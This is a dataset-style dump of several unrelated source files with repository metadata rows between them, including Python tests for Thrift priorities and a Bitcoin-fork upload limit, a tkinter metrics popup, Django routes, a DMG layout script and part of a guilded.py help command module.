
        def important(self):
            return True

        def unspecified(self):
            return True

    class SubPriorityHandler(PriorityService.Iface):
        # NOTE(review): inherits PriorityService.Iface although it is served
        # via SubPriorityService.Processor below — confirm this is intended.
        def child_unspecified(self):
            return True

        def child_highImportant(self):
            return True

    def test_processor_priorities(self):
        handler = self.PriorityHandler()
        processor = PriorityService.Processor(handler)

        # Did we parse annotations correctly
        self.assertEquals(
            processor.get_priority('bestEffort'),
            TPriority.BEST_EFFORT
        )
        self.assertEquals(
            processor.get_priority('normal'),
            TPriority.NORMAL
        )
        self.assertEquals(
            processor.get_priority('important'),
            TPriority.IMPORTANT
        )
        # Methods without an annotation default to HIGH on this service.
        self.assertEquals(
            processor.get_priority('unspecified'),
            TPriority.HIGH
        )

    def test_processor_child_priorities(self):
        handler = self.SubPriorityHandler()
        processor = SubPriorityService.Processor(handler)

        # Parent priorities present in extended services
        # Make sure parent service priorities don't leak to child services
        self.assertEquals(
            processor.get_priority('bestEffort'),
            TPriority.BEST_EFFORT
        )
        self.assertEquals(
            processor.get_priority('normal'),
            TPriority.NORMAL
        )
        self.assertEquals(
            processor.get_priority('important'),
            TPriority.IMPORTANT
        )
        self.assertEquals(
            processor.get_priority('unspecified'),
            TPriority.HIGH
        )

        # Child methods
        self.assertEquals(
            processor.get_priority('child_unspecified'),
            TPriority.NORMAL
        )
        self.assertEquals(
            processor.get_priority('child_highImportant'),
            TPriority.HIGH_IMPORTANT
        )

    def test_header_priorities(self):
        # Placeholder: header-driven priority overrides are not covered yet.
        pass

    def test_server_queues(self):
        handler = self.PriorityHandler()
        processor = PriorityService.Processor(handler)

        # Make sure there are 0 threads for best_effort and 1 queue slot
        # (the queue size cannot be set to 0)
        cppserver = TCppServerTestManager.make_server(processor)
        cppserver.setNewPriorityThreadManager(
            best_effort=0,
            normal=1,
            important=1,
            high=0,
            high_important=0,
            enableTaskStats=False,
            maxQueueLen=1
        )
        # Since we'll have a Cpp2Worker stuck, don't wait for it to exit
        cppserver.setWorkersJoinTimeout(0)

        with TCppServerTestManager(cppserver) as server:
            # Send a request to the server and return immediately:
            # zero timeout makes the client give up while the request stays
            # queued server-side (no best_effort threads ever drain it).
            try:
                self._expiring_rpc(server, PriorityService, 'bestEffort', 0)
            except TTransportException:
                pass

            # The queue for bestEffort should be full, as the first request
            # will never get processed (best_effort=0)
            with self.assertRaises(TApplicationException):
                self._perform_rpc(server, PriorityService, 'bestEffort')

            # However the normal prio one should go through
            self.assertTrue(
                self._perform_rpc(server, PriorityService, 'normal'))

            cppserver.getThreadManager().clearPending()
| 34.218341 | 83 | 0.630296 |
7954561a6ce5860848524a92092e838a5ccdb560 | 917 | py | Python | ShowMetrics.py | axell-brendow/image-processing-work | bf683081e394891e6865214273a69ee0be6b09d8 | [
"MIT"
] | 1 | 2020-10-06T20:34:52.000Z | 2020-10-06T20:34:52.000Z | ShowMetrics.py | axell-brendow/image-processing-work | bf683081e394891e6865214273a69ee0be6b09d8 | [
"MIT"
] | null | null | null | ShowMetrics.py | axell-brendow/image-processing-work | bf683081e394891e6865214273a69ee0be6b09d8 | [
"MIT"
] | null | null | null | import tkinter as tk
class ShowMetrics:
    """Popup (Toplevel) window rendering classification metrics as plain text."""

    def __init__(
        self,
        parent: tk.Tk,
        executionTime,
        FP,
        FN,
        TP,
        TN,
        TPR, # Sensitivity, hit rate, recall, or true positive rate
        TNR, # Specificity or true negative rate
        ACC, # Overall accuracy
        accuracy
    ) -> None:
        # NOTE(review): FP, FN, TP and TN are accepted but never displayed —
        # confirm whether they should appear in the report.
        # TPR/TNR/ACC look like numpy arrays (``.mean()`` is called on them)
        # — TODO confirm with callers.
        self.parent = parent
        self.root = tk.Toplevel(self.parent)
        self.root.title("Metrics")
        # Borderless Text widget holds the whole report as one f-string.
        self.metricsLabel = tk.Text(self.root, borderwidth=0)
        self.metricsLabel.insert(1.0, f'''Execution time: {round(executionTime, 3)} sec
Accuracy: {round(accuracy, 2)}
Overall Accuracy:
{[round(x, 2) for x in ACC]} -> {round(ACC.mean(), 2)}
Sensibility:
{[round(x, 2) for x in TPR]} -> {round(TPR.mean(), 2)}
Specificity:
{[round(x, 2) for x in TNR]} -> {round(TNR.mean(), 2)}
''')
        self.metricsLabel.pack(fill='both', expand=True)
| 25.472222 | 87 | 0.584515 |
7954580b9effbd58bff968767a2bf7d1aae3595c | 341 | py | Python | portafolio/urls.py | JVacca12/FIRST | e3906209cae1198e1fbda4d00bc0a906e8294a69 | [
"MIT"
] | null | null | null | portafolio/urls.py | JVacca12/FIRST | e3906209cae1198e1fbda4d00bc0a906e8294a69 | [
"MIT"
] | null | null | null | portafolio/urls.py | JVacca12/FIRST | e3906209cae1198e1fbda4d00bc0a906e8294a69 | [
"MIT"
] | null | null | null | """Portafolio URLs."""
# Django
from django.urls import include, path
# Django REST Framework
from rest_framework.routers import DefaultRouter
# Views
from portafolio import views
# The router auto-generates the standard DRF routes for the portafolio
# viewset under the 'portafolio' URL prefix.
router = DefaultRouter()
router.register(r'portafolio', views.PortafolioViewSet, basename='portafolio')

# Expose every route produced by the router at the module root.
urlpatterns = [
    path('', include(router.urls))
]
79545890d90ff4c65a20dd8275c6d792c3daa8fb | 374 | py | Python | torch_kalman/internals/repr.py | Suhwan-Dev/torch-kalman | f310c42e264d1642819e4c49a8b0212209a18a85 | [
"MIT"
] | null | null | null | torch_kalman/internals/repr.py | Suhwan-Dev/torch-kalman | f310c42e264d1642819e4c49a8b0212209a18a85 | [
"MIT"
] | null | null | null | torch_kalman/internals/repr.py | Suhwan-Dev/torch-kalman | f310c42e264d1642819e4c49a8b0212209a18a85 | [
"MIT"
] | null | null | null | from torch import Tensor
class NiceRepr:
    """Mixin building a keyword-style ``__repr__`` from ``_repr_attrs``.

    Subclasses set ``_repr_attrs`` to the attribute names to display;
    Tensor-valued attributes are shown by their size rather than contents.
    """

    # Subclasses must override with an iterable of attribute names.
    _repr_attrs = None

    def __repr__(self) -> str:
        parts = []
        for attr in self._repr_attrs:
            value = getattr(self, attr)
            if isinstance(value, Tensor):
                # Avoid dumping tensor data; the shape is enough.
                value = value.size()
            parts.append(f"{attr}={value!r}")
        return f"{type(self).__name__}({', '.join(parts)})"
| 24.933333 | 70 | 0.510695 |
795458e326508a3ef1e49b4b7506763e2e81e2ae | 9,473 | py | Python | qa/rpc-tests/maxuploadtarget.py | thoughtnetwork/thought | 7da757fbbf5c868b8b06aca57c8b3a1c82b1e0d2 | [
"MIT"
] | null | null | null | qa/rpc-tests/maxuploadtarget.py | thoughtnetwork/thought | 7da757fbbf5c868b8b06aca57c8b3a1c82b1e0d2 | [
"MIT"
] | 3 | 2019-10-16T15:33:36.000Z | 2021-07-28T00:38:37.000Z | qa/rpc-tests/maxuploadtarget.py | thoughtnetwork/thought | 7da757fbbf5c868b8b06aca57c8b3a1c82b1e0d2 | [
"MIT"
] | 1 | 2021-06-30T05:04:17.000Z | 2021-06-30T05:04:17.000Z | #!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Copyright (c) 2017-2021 Thought Networks, LLC
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.mininode import *
from test_framework.test_framework import ThoughtTestFramework
from test_framework.util import *
'''
Test behavior of -maxuploadtarget.
* Verify that getdata requests for old blocks (>1week) are dropped
if uploadtarget has been reached.
* Verify that getdata requests for recent blocks are respected even
if uploadtarget has been reached.
* Verify that the upload counters are reset after 24 hours.
'''
# TestNode: bare-bones "peer". Used mostly as a conduit through which a test
# sends p2p messages to a node, generating the messages in the main testing logic.
class TestNode(NodeConnCB):
    """Bare-bones peer used by the test to drive p2p traffic at the node."""

    def __init__(self):
        NodeConnCB.__init__(self)
        self.connection = None
        self.ping_counter = 1
        self.last_pong = msg_pong()
        self.block_receive_map = {}

    def add_connection(self, conn):
        self.connection = conn
        self.peer_disconnected = False

    def on_inv(self, conn, message):
        # Inventory announcements are irrelevant to these tests.
        pass

    # Track the last getdata message we receive (used in the test).
    def on_getdata(self, conn, message):
        self.last_getdata = message

    def on_block(self, conn, message):
        # Count how many times each block hash has been delivered to us.
        block = message.block
        block.calc_sha256()
        seen = self.block_receive_map.get(block.sha256, 0)
        self.block_receive_map[block.sha256] = seen + 1

    # Spin until the verack message is received from the node. We use this
    # to signal that our test can begin.
    def wait_for_verack(self):
        return wait_until(lambda: self.verack_received, timeout=10)

    def wait_for_disconnect(self):
        return wait_until(lambda: self.peer_disconnected, timeout=10)

    # Wrapper around the underlying NodeConn's send_message.
    def send_message(self, message):
        self.connection.send_message(message)

    def on_pong(self, conn, message):
        self.last_pong = message

    def on_close(self, conn):
        self.peer_disconnected = True

    # A ping/pong round trip guarantees prior messages were processed.
    def sync_with_ping(self, timeout=30):
        expected = self.ping_counter
        self.connection.send_message(msg_ping(nonce=expected))
        success = wait_until(lambda: self.last_pong.nonce == expected,
                             timeout=timeout)
        self.ping_counter += 1
        return success
class MaxUploadTest(ThoughtTestFramework):
    """Exercise -maxuploadtarget accounting for historic vs. recent blocks."""

    def __init__(self):
        super().__init__()
        self.setup_clean_chain = True
        self.num_nodes = 1

        # Cache for utxos, as the listunspent may take a long time later in the test
        self.utxo_cache = []

    def setup_network(self):
        # Start a node with maxuploadtarget of 200 MB (/24h)
        self.nodes = []
        self.nodes.append(start_node(0, self.options.tmpdir, ["-debug", "-maxuploadtarget=200", "-blockmaxsize=999000", "-maxtipage="+str(2*60*60*24*7)]))

    def run_test(self):
        # Advance all nodes 2 weeks in the future
        old_mocktime = get_mocktime()
        current_mocktime = old_mocktime + 2*60*60*24*7
        set_mocktime(current_mocktime)
        set_node_times(self.nodes, current_mocktime)

        # Before we connect anything, we first set the time on the node
        # to be in the past, otherwise things break because the CNode
        # time counters can't be reset backward after initialization
        self.nodes[0].setmocktime(old_mocktime)

        # Generate some old blocks
        self.nodes[0].generate(130)

        # test_nodes[0] will only request old blocks
        # test_nodes[1] will only request new blocks
        # test_nodes[2] will test resetting the counters
        test_nodes = []
        connections = []

        for i in range(3):
            test_nodes.append(TestNode())
            connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_nodes[i]))
            test_nodes[i].add_connection(connections[i])

        NetworkThread().start() # Start up network handling in another thread
        [x.wait_for_verack() for x in test_nodes]

        # Test logic begins here

        # Now mine a big block
        mine_large_block(self.nodes[0], self.utxo_cache)

        # Store the hash; we'll request this later
        big_old_block = self.nodes[0].getbestblockhash()
        old_block_size = self.nodes[0].getblock(big_old_block, True)['size']
        big_old_block = int(big_old_block, 16)

        # Advance to two days ago
        self.nodes[0].setmocktime(current_mocktime - 2*60*60*24)

        # Mine one more block, so that the prior block looks old
        mine_large_block(self.nodes[0], self.utxo_cache)

        # We'll be requesting this new block too
        big_new_block = self.nodes[0].getbestblockhash()
        big_new_block = int(big_new_block, 16)

        # test_nodes[0] will test what happens if we just keep requesting
        # the same big old block too many times (expect: disconnect)

        getdata_request = msg_getdata()
        getdata_request.inv.append(CInv(2, big_old_block))

        # Work out how many old-block downloads fit under the upload target
        # after subtracting the buffer reserved for relaying recent blocks.
        max_bytes_per_day = 200*1024*1024
        daily_buffer = 144 * MAX_BLOCK_SIZE
        max_bytes_available = max_bytes_per_day - daily_buffer
        success_count = max_bytes_available // old_block_size

        # 144MB will be reserved for relaying new blocks, so expect this to
        # succeed for ~70 tries.
        for i in range(success_count):
            test_nodes[0].send_message(getdata_request)
            test_nodes[0].sync_with_ping()
            assert_equal(test_nodes[0].block_receive_map[big_old_block], i+1)

        assert_equal(len(self.nodes[0].getpeerinfo()), 3)
        # At most a couple more tries should succeed (depending on how long
        # the test has been running so far).
        for i in range(3):
            test_nodes[0].send_message(getdata_request)
        test_nodes[0].wait_for_disconnect()
        assert_equal(len(self.nodes[0].getpeerinfo()), 2)
        print("Peer 0 disconnected after downloading old block too many times")

        # Requesting the current block on test_nodes[1] should succeed indefinitely,
        # even when over the max upload target.
        # We'll try 200 times
        getdata_request.inv = [CInv(2, big_new_block)]
        for i in range(200):
            test_nodes[1].send_message(getdata_request)
            test_nodes[1].sync_with_ping()
            assert_equal(test_nodes[1].block_receive_map[big_new_block], i+1)

        print("Peer 1 able to repeatedly download new block")

        # But if test_nodes[1] tries for an old block, it gets disconnected too.
        getdata_request.inv = [CInv(2, big_old_block)]
        test_nodes[1].send_message(getdata_request)
        test_nodes[1].wait_for_disconnect()
        assert_equal(len(self.nodes[0].getpeerinfo()), 1)

        print("Peer 1 disconnected after trying to download old block")

        print("Advancing system time on node to clear counters...")

        # If we advance the time by 24 hours, then the counters should reset,
        # and test_nodes[2] should be able to retrieve the old block.
        self.nodes[0].setmocktime(current_mocktime)
        test_nodes[2].sync_with_ping()
        test_nodes[2].send_message(getdata_request)
        test_nodes[2].sync_with_ping()
        assert_equal(test_nodes[2].block_receive_map[big_old_block], 1)

        print("Peer 2 able to download old block")

        [c.disconnect_node() for c in connections]

        #stop and start node 0 with 1MB maxuploadtarget, whitelist 127.0.0.1
        print("Restarting nodes with -whitelist=127.0.0.1")
        stop_node(self.nodes[0], 0)
        self.nodes[0] = start_node(0, self.options.tmpdir, ["-debug", "-whitelist=127.0.0.1", "-maxuploadtarget=1", "-blockmaxsize=999000", "-maxtipage="+str(2*60*60*24*7)])

        #recreate/reconnect 3 test nodes
        test_nodes = []
        connections = []

        for i in range(3):
            test_nodes.append(TestNode())
            connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_nodes[i]))
            test_nodes[i].add_connection(connections[i])

        NetworkThread().start() # Start up network handling in another thread
        [x.wait_for_verack() for x in test_nodes]

        #retrieve 20 blocks which should be enough to break the 1MB limit
        getdata_request.inv = [CInv(2, big_new_block)]
        for i in range(20):
            test_nodes[1].send_message(getdata_request)
            test_nodes[1].sync_with_ping()
            assert_equal(test_nodes[1].block_receive_map[big_new_block], i+1)

        getdata_request.inv = [CInv(2, big_old_block)]
        test_nodes[1].send_message(getdata_request)
        test_nodes[1].wait_for_disconnect()
        assert_equal(len(self.nodes[0].getpeerinfo()), 3) #node is still connected because of the whitelist

        print("Peer 1 still connected after trying to download old block (whitelisted)")

        [c.disconnect_node() for c in connections]
if __name__ == '__main__':
    # Script entry point: delegate to the test framework's main() driver.
    MaxUploadTest().main()
| 39.307054 | 173 | 0.667476 |
7954594b11ba795a93ec65933aebccda65653abb | 790 | py | Python | python/tempsensor/setup.py | lalajoie/g1-Security | 2657e7cc86eee1cc3bf302d288bedf54bbb5200b | [
"MIT"
] | null | null | null | python/tempsensor/setup.py | lalajoie/g1-Security | 2657e7cc86eee1cc3bf302d288bedf54bbb5200b | [
"MIT"
] | null | null | null | python/tempsensor/setup.py | lalajoie/g1-Security | 2657e7cc86eee1cc3bf302d288bedf54bbb5200b | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import setuptools
with open('README.md', "r") as f:
readme = f.read()
setuptools.setup(
name="PyMLX90614",
description="MLX90614 temperature sensor library",
version="0.0.3",
author="Connor Kneebone",
author_email="connor@sfxrescue.com",
url="https://github.com/Conr86/PyMLX90614",
license='MIT',
packages=setuptools.find_packages(exclude=['tests', 'notebooks']),
long_description=readme,
long_description_content_type="text/markdown",
install_requires=['smbus2'],
classifiers=[
"Programming Language :: Python :: 3",
'Intended Audience :: Developers',
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
keywords='mlx90614 i2c smbus smbus2',
)
| 29.259259 | 70 | 0.663291 |
795459d5c8f4095918358e36eba7329133afb4ac | 3,752 | py | Python | contrib/macdeploy/custom_dsstore.py | Daviel360/litecoin | 0301f78bb93763684c9b3b67724ba8af14cde37e | [
"MIT"
] | null | null | null | contrib/macdeploy/custom_dsstore.py | Daviel360/litecoin | 0301f78bb93763684c9b3b67724ba8af14cde37e | [
"MIT"
] | null | null | null | contrib/macdeploy/custom_dsstore.py | Daviel360/litecoin | 0301f78bb93763684c9b3b67724ba8af14cde37e | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2013-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import biplist
from ds_store import DSStore
from mac_alias import Alias
import sys
# Positional args: path of the .DS_Store to write, and the volume/package name.
output_file = sys.argv[1]
package_name_ns = sys.argv[2]

ds = DSStore.open(output_file, 'w+')
# Finder window settings for the DMG root: fixed bounds, no toolbar/sidebar.
ds['.']['bwsp'] = {
    'ShowStatusBar': False,
    'WindowBounds': '{{300, 280}, {500, 343}}',
    'ContainerShowSidebar': False,
    'SidebarWidth': 0,
    'ShowTabView': False,
    'PreviewPaneVisibility': False,
    'ShowToolbar': False,
    'ShowSidebar': False,
    'ShowPathbar': True
}
# Icon-view preferences ('icvp') for the Finder window; the alias blob is a
# serialized macOS alias record later re-pointed at this package's
# .background/background.tiff (see Alias.from_bytes below).
icvp = {
    'gridOffsetX': 0.0,
    'textSize': 12.0,
    'viewOptionsVersion': 1,
    'backgroundImageAlias': b'\x00\x00\x00\x00\x02\x1e\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd1\x94\\\xb0H+\x00\x05\x00\x00\x00\x98\x0fbackground.tiff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\xd19\xb0\xf8\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\r\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b.background\x00\x00\x10\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x11\x00\x08\x00\x00\xd19\xb0\xf8\x00\x00\x00\x01\x00\x04\x00\x00\x00\x98\x00\x0e\x00 \x00\x0f\x00b\x00a\x00c\x00k\x00g\x00r\x00o\x00u\x00n\x00d\x00.\x00t\x00i\x00f\x00f\x00\x0f\x00\x02\x00\x00\x00\x12\x00\x1c/.background/background.tiff\x00\x14\x01\x06\x00\x00\x00\x00\x01\x06\x00\x02\x00\x00\x0cMacintosh HD\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce\x97\xab\xc3H+\x00\x00\x01\x88[\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02u\xab\x8d\xd1\x94\\\xb0devrddsk\xff\xff\xff\xff\x00\x00\t \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07bitcoin\x00\x00\x10\x00\x08\x00\x00\xce\x97\xab\xc3\x00\x00\x00\x11\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x01\x00\x14\x01\x88[\x88\x00\x16\xa9\t\x00\x08\xfaR\x00\x08\xfaQ\x00\x02d\x8e\x00\x0e\x00\x02\x00\x00\x00\x0f\x00\x1a\x00\x0c\x00M\x00a\x00c\x00i\x00n\x00t\x00o\x00s\x00h\x00 \x00H\x00D\x00\x13\x00\x01/\x00\x00\x15\x00\x02\x00\x14\xff\xff\x00\x00\xff\xff\x00\x00',
    'backgroundColorBlue': 1.0,
    'iconSize': 96.0,
    'backgroundColorGreen': 1.0,
    'arrangeBy': 'none',
    'showIconPreview': True,
    'gridSpacing': 100.0,
    'gridOffsetY': 0.0,
    'showItemInfo': False,
    'labelOnBottom': True,
    'backgroundType': 2,
    'backgroundColorRed': 1.0
}
# Re-point the template alias record at this package's volume and temp DMG.
alias = Alias.from_bytes(icvp['backgroundImageAlias'])
alias.volume.name = package_name_ns
alias.volume.posix_path = '/Volumes/' + package_name_ns
# NOTE(review): hard-coded builder-machine paths below — confirm they are
# intentional for reproducible builds.
alias.volume.disk_image_alias.target.filename = package_name_ns + '.temp.dmg'
alias.volume.disk_image_alias.target.carbon_path = 'Macintosh HD:Users:\x00chocolatechipuser:\x00Documents:\x00chocolatechip:\x00chocolatechip:\x00' + package_name_ns + '.temp.dmg'
alias.volume.disk_image_alias.target.posix_path = 'Users/chocolatechipuser/Documents/chocolatechip/chocolatechip/' + package_name_ns + '.temp.dmg'
alias.target.carbon_path = package_name_ns + ':.background:\x00background.tiff'
icvp['backgroundImageAlias'] = biplist.Data(alias.to_bytes())
ds['.']['icvp'] = icvp

ds['.']['vSrn'] = ('long', 1)

# Icon positions inside the Finder window.
ds['Applications']['Iloc'] = (370, 156)
ds['ChocolateChip-Qt.app']['Iloc'] = (128, 156)

ds.flush()
ds.close()
795459f62e10926d736bec16eb7d375dbff9b817 | 48,822 | py | Python | guilded/ext/commands/help.py | ThomasJRyan/guilded.py | e1bb5cab839c80c851d4538111e4f1563bb15187 | [
"MIT"
] | 79 | 2020-09-19T22:48:04.000Z | 2022-03-25T03:49:26.000Z | guilded/ext/commands/help.py | ThomasJRyan/guilded.py | e1bb5cab839c80c851d4538111e4f1563bb15187 | [
"MIT"
] | 19 | 2020-09-07T21:54:42.000Z | 2022-02-08T05:08:05.000Z | guilded/ext/commands/help.py | ThomasJRyan/guilded.py | e1bb5cab839c80c851d4538111e4f1563bb15187 | [
"MIT"
] | 24 | 2020-09-05T16:28:42.000Z | 2022-03-16T02:31:10.000Z | """
MIT License
Copyright (c) 2020-present windowsboy111, shay (shayypy)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
------------------------------------------------------------------------------
This project includes code from https://github.com/Rapptz/discord.py, which is
available under the MIT license:
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import copy
import functools
import itertools
import re
import guilded.utils
from .context import Context
from .core import Command, Group
from .errors import CommandError
# Public API re-exported by this module.
__all__ = (
    'Paginator',
    'HelpCommand',
    'DefaultHelpCommand',
    'MinimalHelpCommand',
)
# help -> shows info of bot on top/bottom and lists subcommands
# help command -> shows detailed info of command
# help command <subcommand chain> -> same as above
# <description>
# <command signature with aliases>
# <long doc>
# Cog:
# <command> <shortdoc>
# <command> <shortdoc>
# Other Cog:
# <command> <shortdoc>
# No Category:
# <command> <shortdoc>
# Type <prefix>help command for more info on a command.
# You can also type <prefix>help category for more info on a category.
class Paginator:
    """A utility that accumulates lines of text and splits them into
    pages small enough to fit inside a single Guilded message.
    .. container:: operations
        .. describe:: len(x)
            Returns the total number of characters in the paginator.
    Attributes
    -----------
    prefix: :class:`str`
        Text inserted at the top of every page, e.g. three backticks.
    suffix: :class:`str`
        Text appended at the bottom of every page, e.g. three backticks.
    max_size: :class:`int`
        The maximum number of codepoints a single page may contain.
    linesep: :class:`str`
        The separator joined between lines, e.g. a newline character.
    """
    def __init__(self, prefix='```', suffix='```', max_size=2000, linesep='\n'):
        self.prefix = prefix
        self.suffix = suffix
        self.max_size = max_size
        self.linesep = linesep
        self.clear()
    def _start_new_page(self):
        # Begin a fresh working page, pre-seeded with the prefix when set.
        if self.prefix is None:
            self._current_page = []
            self._count = 0
        else:
            self._current_page = [self.prefix]
            self._count = len(self.prefix) + self._linesep_len
    def clear(self):
        """Discard all pages and reset the paginator to its initial state."""
        self._pages = []
        self._start_new_page()
    @property
    def _prefix_len(self):
        return 0 if not self.prefix else len(self.prefix)
    @property
    def _suffix_len(self):
        return 0 if not self.suffix else len(self.suffix)
    @property
    def _linesep_len(self):
        return len(self.linesep)
    def add_line(self, line='', *, empty=False):
        """Append a line to the current page, rolling over to a new page
        when the current one would overflow :attr:`max_size`.
        Parameters
        -----------
        line: :class:`str`
            The line to add.
        empty: :class:`bool`
            Whether an extra blank line should follow.
        Raises
        ------
        RuntimeError
            The line cannot fit on any page given :attr:`max_size`.
        """
        max_page_size = self.max_size - self._prefix_len - self._suffix_len - 2 * self._linesep_len
        if len(line) > max_page_size:
            raise RuntimeError(f'Line exceeds maximum page size {max_page_size}')
        # Would this line push the working page past its budget? If so,
        # seal it off first and start the next one.
        projected = self._count + len(line) + self._linesep_len
        if projected > self.max_size - self._suffix_len:
            self.close_page()
        self._current_page.append(line)
        self._count += len(line) + self._linesep_len
        if empty:
            self._current_page.append('')
            self._count += self._linesep_len
    def close_page(self):
        """Seal the page under construction and begin a new one."""
        if self.suffix is not None:
            self._current_page.append(self.suffix)
        self._pages.append(self.linesep.join(self._current_page))
        self._start_new_page()
    def __len__(self):
        return self._count + sum(map(len, self._pages))
    @property
    def pages(self):
        """List[:class:`str`]: The rendered list of pages."""
        # Anything beyond the bare prefix means the working page has content.
        threshold = 0 if self.prefix is None else 1
        if len(self._current_page) > threshold:
            self.close_page()
        return self._pages
    def __repr__(self):
        return (
            f'<Paginator prefix: {self.prefix!r} suffix: {self.suffix!r} '
            f'linesep: {self.linesep!r} max_size: {self.max_size} count: {self._count}>'
        )
def _not_overriden(f):
f.__help_command_not_overriden__ = True
return f
class _HelpCommandImpl(Command):
    """Internal :class:`Command` subclass registered with the bot on behalf
    of a :class:`HelpCommand` instance.
    A fresh copy of the wrapped help command is made on every invocation
    (see :meth:`prepare`) so concurrent invocations do not share state.
    """
    def __init__(self, inject, *args, **kwargs):
        super().__init__(inject.command_callback, *args, **kwargs)
        # `_original` is the pristine help command; `_injected` is the
        # per-invocation copy currently bound to this command.
        self._original = self._injected = inject
    async def prepare(self, ctx):
        # Copy the help command and rebind our callback to the copy so this
        # invocation runs against isolated state.
        self._injected = injected = self._original.copy()
        injected.context = ctx
        self.callback = injected.command_callback
        on_error = injected.on_help_command_error
        if not hasattr(on_error, '__help_command_not_overriden__'):
            # Only install an error handler when the subclass overrode it;
            # the cog variant strips the extra cog argument first.
            self.on_error = self._on_error_cog_implementation if self.cog else on_error
        await super().prepare(ctx)
    async def _parse_arguments(self, ctx):
        # Make the parser think we don't have a cog so it doesn't
        # inject the parameter into `ctx.args`.
        original_cog = self.cog
        self.cog = None
        try:
            await super()._parse_arguments(ctx)
        finally:
            self.cog = original_cog
    async def _on_error_cog_implementation(self, _, ctx, error):
        # `_` absorbs the cog argument before delegating to the help command.
        await self._injected.on_help_command_error(ctx, error)
    @property
    def clean_params(self):
        # Drop the leading (context) parameter from the parameter mapping.
        result = self.params.copy()
        try:
            del result[next(iter(result))]
        except StopIteration:
            raise ValueError('Missing context parameter') from None
        else:
            return result
    def _inject_into_cog(self, cog):
        # Warning: hacky
        # Make the cog think that get_commands returns this command
        # as well if we inject it without modifying __cog_commands__
        # since that's used for the injection and ejection of cogs.
        def wrapped_get_commands(*, _original=cog.get_commands):
            ret = _original()
            ret.append(self)
            return ret
        # Ditto here
        def wrapped_walk_commands(*, _original=cog.walk_commands):
            yield from _original()
            yield self
        functools.update_wrapper(wrapped_get_commands, cog.get_commands)
        functools.update_wrapper(wrapped_walk_commands, cog.walk_commands)
        cog.get_commands = wrapped_get_commands
        cog.walk_commands = wrapped_walk_commands
        self.cog = cog
    def _eject_cog(self):
        if self.cog is None:
            return
        # revert back into their original methods
        # (update_wrapper above stored them on `__wrapped__`)
        cog = self.cog
        cog.get_commands = cog.get_commands.__wrapped__
        cog.walk_commands = cog.walk_commands.__wrapped__
        self.cog = None
class HelpCommand:
    r"""The base implementation for help command formatting.
    .. note::
        Internally instances of this class are deep copied every time
        the command itself is invoked to prevent a race condition
        mentioned in :dpyissue:`2123`.
        This means that relying on the state of this class to be
        the same between command invocations would not work as expected.
    Attributes
    ------------
    context: Optional[:class:`Context`]
        The context that invoked this help formatter. This is generally set after
        the help command assigned, :func:`command_callback`\, has been called.
